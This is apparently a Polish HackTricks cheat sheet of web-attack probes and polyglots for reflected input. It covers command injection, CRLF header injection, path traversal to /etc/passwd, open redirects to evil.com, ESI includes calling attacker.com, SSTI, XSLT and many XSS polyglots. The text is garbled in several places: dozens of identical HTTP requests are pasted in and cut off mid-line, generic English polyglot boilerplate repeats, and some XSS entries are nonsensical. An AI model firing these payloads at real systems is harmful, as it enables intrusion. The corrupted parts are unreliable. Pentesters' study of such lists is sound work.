.. | ||
README.md | ||
web-vulns-list.md |
Techniki odbijające - PoCs i Polygloths CheatSheet
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Celem tych PoC i Polygloths jest zapewnienie testerowi szybkiego podsumowania podatności, które może wykorzystać, jeśli jego wejście jest w jakiś sposób odbijane w odpowiedzi.
{% hint style="warning" %} Ten cheatsheet nie proponuje wyczerpującej listy testów dla każdej podatności, tylko kilka podstawowych. Jeśli szukasz bardziej kompleksowych testów, przejdź do proponowanej podatności. {% endhint %}
{% hint style="danger" %} Nie znajdziesz tutaj wstrzykiwań zależnych od typu zawartości, takich jak XXE, ponieważ zazwyczaj sam spróbujesz ich, jeśli znajdziesz żądanie wysyłające dane XML. Nie znajdziesz tutaj również wstrzykiwań do bazy danych, ponieważ nawet jeśli niektóre treści mogą być odbijane, to zależy to głównie od technologii i struktury backendu bazy danych. {% endhint %}
Lista Polygloths
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Wstrzykiwanie szablonów po stronie klienta
Podstawowe testy
{{7*7}}
[7*7]
Poligloty
A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between file formats. By carefully crafting a file that adheres to the specifications of multiple file formats, it is possible to create a polyglot that can be interpreted differently by different applications.
Polyglots can be used in various ways during a penetration test. They can be used to bypass file upload filters, evade detection by security scanners, or even execute arbitrary code on a target system.
It is important to note that the creation and use of polyglots should be done responsibly and within the boundaries of the law. Using polyglots for malicious purposes is illegal and unethical.
Poligloty
Poliglot to plik, który może być interpretowany jako różne typy plików w zależności od kontekstu, w którym jest uruchamiany. W kontekście hakowania stron internetowych, poligloty mogą być używane do omijania środków bezpieczeństwa i wykonywania złośliwego kodu.
Poligloty są zwykle tworzone poprzez wykorzystanie podobieństw między formatami plików. Poprzez staranne opracowanie pliku, który spełnia specyfikacje wielu formatów plików, można stworzyć poliglot, który może być interpretowany inaczej przez różne aplikacje.
Poligloty mogą być wykorzystywane na różne sposoby podczas testu penetracyjnego. Mogą być używane do omijania filtrów przesyłania plików, unikania wykrycia przez skanery bezpieczeństwa, a nawet do wykonywania dowolnego kodu na docelowym systemie.
Ważne jest zauważenie, że tworzenie i używanie poliglotów powinno odbywać się odpowiedzialnie i w granicach prawa. Używanie poliglotów w celach złośliwych jest nielegalne i nieetyczne.
{{7*7}}[7*7]
Wstrzykiwanie poleceń
Podstawowe testy
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
Poligloty
A polyglot is a file that can be interpreted as multiple file types. In the context of hacking, polyglots can be used to bypass security measures and execute malicious code. They are particularly useful in scenarios where different file types are allowed or expected, such as file uploads on a web application.
Polyglots are created by carefully crafting a file that adheres to the specifications of multiple file formats. By doing so, the file can be interpreted differently depending on the context in which it is opened. This allows an attacker to exploit vulnerabilities in different file parsers or interpreters.
Polyglots can be used for various purposes, including:
-
File format bypass: By disguising a malicious file as a legitimate file type, such as an image or a document, an attacker can bypass security measures that only check for specific file extensions.
-
Code execution: By embedding malicious code within a polyglot, an attacker can exploit vulnerabilities in different file parsers or interpreters to execute arbitrary commands on a target system.
-
Data exfiltration: Polyglots can also be used to exfiltrate sensitive data from a target system. By embedding the data within the polyglot, an attacker can extract it when the file is opened or processed.
Creating a polyglot requires a deep understanding of the specifications of the file formats involved, as well as the vulnerabilities in the parsers or interpreters. It is a complex and advanced technique that can be used to evade detection and carry out sophisticated attacks.
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
CRLF
Podstawowe testy
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp
```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
Wiszące znaczniki
Podstawowe testy
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
Włączenie pliku/Przeszukiwanie ścieżki
Podstawowe testy
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
Przekierowanie otwarte / Podrabianie żądań po stronie serwera
Podstawowe testy
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
ReDoS
Podstawowe testy
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
Włączenie po stronie serwera/Włączenie po stronie krawędzi
Podstawowe testy
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Poligloty
A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between file formats. By carefully crafting a file that adheres to the specifications of multiple file formats, it is possible to create a polyglot that can be interpreted differently by different applications.
Polyglots can be used in various ways during a web hacking engagement. For example, a polyglot file can be uploaded to a web application that accepts multiple file types. If the application does not properly validate the file type, it may execute the file as a different type than intended, leading to potential security vulnerabilities.
Polyglots can also be used to hide malicious code within seemingly harmless files. By creating a file that is valid in multiple formats, an attacker can bypass security measures that only check for specific file types.
When working with polyglots, it is important to understand the specifications of the file formats involved and how different applications interpret them. This knowledge is crucial for crafting effective polyglots and exploiting vulnerabilities.
Overall, polyglots are a powerful tool in the arsenal of a web hacker. By leveraging the flexibility of file formats, polyglots can be used to bypass security measures and execute malicious code, making them an important technique to be aware of during web hacking engagements.
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Podrabianie żądań po stronie serwera
Tutaj można użyć tych samych testów, które są używane do podrobienia przekierowań (Open Redirect).
Wstrzykiwanie szablonów po stronie serwera
Podstawowe testy
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Poligloty
A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between file formats. By carefully crafting a file that adheres to the specifications of multiple file formats, it is possible to create a polyglot that can be interpreted differently by different applications.
Polyglots can be used in various ways during a penetration test. They can be used to bypass file upload filters, evade detection by security scanners, or even execute arbitrary code on a target system.
It is important to note that the creation and use of polyglots should be done responsibly and within the boundaries of the law. Using polyglots for malicious purposes is illegal and unethical.
Poligloty
Poliglot to plik, który może być interpretowany jako różne typy plików w zależności od kontekstu, w którym jest uruchamiany. W kontekście hakowania stron internetowych, poligloty mogą być używane do omijania środków bezpieczeństwa i wykonywania złośliwego kodu.
Poligloty są zwykle tworzone poprzez wykorzystanie podobieństw między formatami plików. Poprzez staranne opracowanie pliku, który spełnia specyfikacje wielu formatów plików, można stworzyć poliglot, który może być interpretowany inaczej przez różne aplikacje.
Poligloty mogą być wykorzystywane na różne sposoby podczas testu penetracyjnego. Mogą być używane do omijania filtrów przesyłania plików, unikania wykrycia przez skanery bezpieczeństwa, a nawet do wykonywania dowolnego kodu na docelowym systemie.
Ważne jest zauważenie, że tworzenie i używanie poliglotów powinno odbywać się odpowiedzialnie i w granicach prawa. Używanie poliglotów w celach złośliwych jest nielegalne i nieetyczne.
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
Wstrzyknięcie XSLT po stronie serwera
Podstawowe testy
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Poligloty
A polyglot is a file that can be interpreted as multiple file types. In the context of hacking, polyglots can be used to bypass security measures and execute malicious code. They are particularly useful in scenarios where different file types are allowed in different contexts.
Polyglots are created by exploiting the similarities and overlapping syntax of different file formats. By carefully crafting a file, it is possible to create a polyglot that can be interpreted as multiple file types, such as HTML, JavaScript, or even image files.
Polyglots can be used in various hacking techniques, including XSS attacks, file upload vulnerabilities, and server-side request forgery (SSRF) attacks. By disguising malicious code as a benign file type, hackers can bypass security filters and execute their payloads.
It is important to note that the creation and use of polyglots should only be done for ethical hacking purposes and with proper authorization. Using polyglots for malicious activities is illegal and can result in severe consequences.
In conclusion, polyglots are powerful tools in the hacker's arsenal, allowing them to bypass security measures and execute malicious code by exploiting the overlapping syntax of different file types.
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
Podstawowe testy
Testy podstawowe
<script>alert('XSS')</script>
Testy z atrybutami
<img src="x" onerror="alert('XSS')">
Testy z atrybutami i zdarzeniami
<img src="x" onerror="javascript:alert('XSS')">
Testy z atrybutami i zdarzeniami (bez apostrofów)
<img src="x" onerror=javascript:alert('XSS')>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów)
<img src="x" onerror=alert`XSS`>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks)
<img src="x" onerror=alert`XSS`>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks i interpolacji)
<img src="x" onerror=${alert`XSS`}>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks i interpolacji, z użyciem funkcji)
<img src="x" onerror=${(a)=>a`XSS`}>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks i interpolacji, z użyciem funkcji i parametrów)
<img src="x" onerror=${(a,b)=>a`XSS${b}`}>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks i interpolacji, z użyciem funkcji i parametrów, z użyciem obiektu)
<img src="x" onerror=${(a,b)=>a`XSS${b}`({})}>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks i interpolacji, z użyciem funkcji i parametrów, z użyciem obiektu i wywołania metody)
<img src="x" onerror=${(a,b)=>a`XSS${b}`({toString:()=>`alert('XSS')`})}>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks i interpolacji, z użyciem funkcji i parametrów, z użyciem obiektu i wywołania metody, z użyciem funkcji eval)
<img src="x" onerror=${(a,b)=>a`XSS${b}`({toString:()=>`eval(atob('YWxlcnQoJ0hUVFAvMS4wJyk7')`})}>
Testy z atrybutami i zdarzeniami (bez apostrofów i nawiasów, z użyciem backticks i interpolacji, z użyciem funkcji i parametrów, z użyciem obiektu i wywołania metody, z użyciem funkcji eval i kodowania base64)
<img src="x" onerror=${(a,b)=>a`XSS${b}`({toString:()=>`eval(atob('YWxlcnQoJ0hUVFAvMS4wJyk7')`})}>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
Poligloty
A polyglot is a file that can be interpreted as multiple file types. In the context of hacking, polyglots can be used to bypass security measures and execute malicious code. They are particularly useful in scenarios where different file types are allowed or expected, such as file uploads on a web application.
Polyglots are created by carefully crafting a file that adheres to the specifications of multiple file formats. By doing so, the file can be interpreted differently depending on the context in which it is opened. This allows an attacker to exploit vulnerabilities in different file parsers or interpreters.
Polyglots can be used for various purposes, including:
-
File format bypass: By disguising a malicious file as a legitimate file type, such as an image or a document, an attacker can bypass security measures that only check for specific file extensions.
-
Code execution: By embedding malicious code within a polyglot, an attacker can exploit vulnerabilities in different file parsers or interpreters to execute arbitrary commands on a target system.
-
Data exfiltration: Polyglots can also be used to exfiltrate sensitive data from a target system. By embedding the data within the polyglot, an attacker can bypass security measures that only inspect specific file types.
Creating a polyglot requires a deep understanding of the specifications of the file formats involved. It involves carefully manipulating the file's structure and content to ensure that it can be interpreted correctly by multiple parsers or interpreters.
Polyglots are a powerful tool in a hacker's arsenal, as they can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of the existence of polyglots and to implement measures to detect and prevent their exploitation.
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
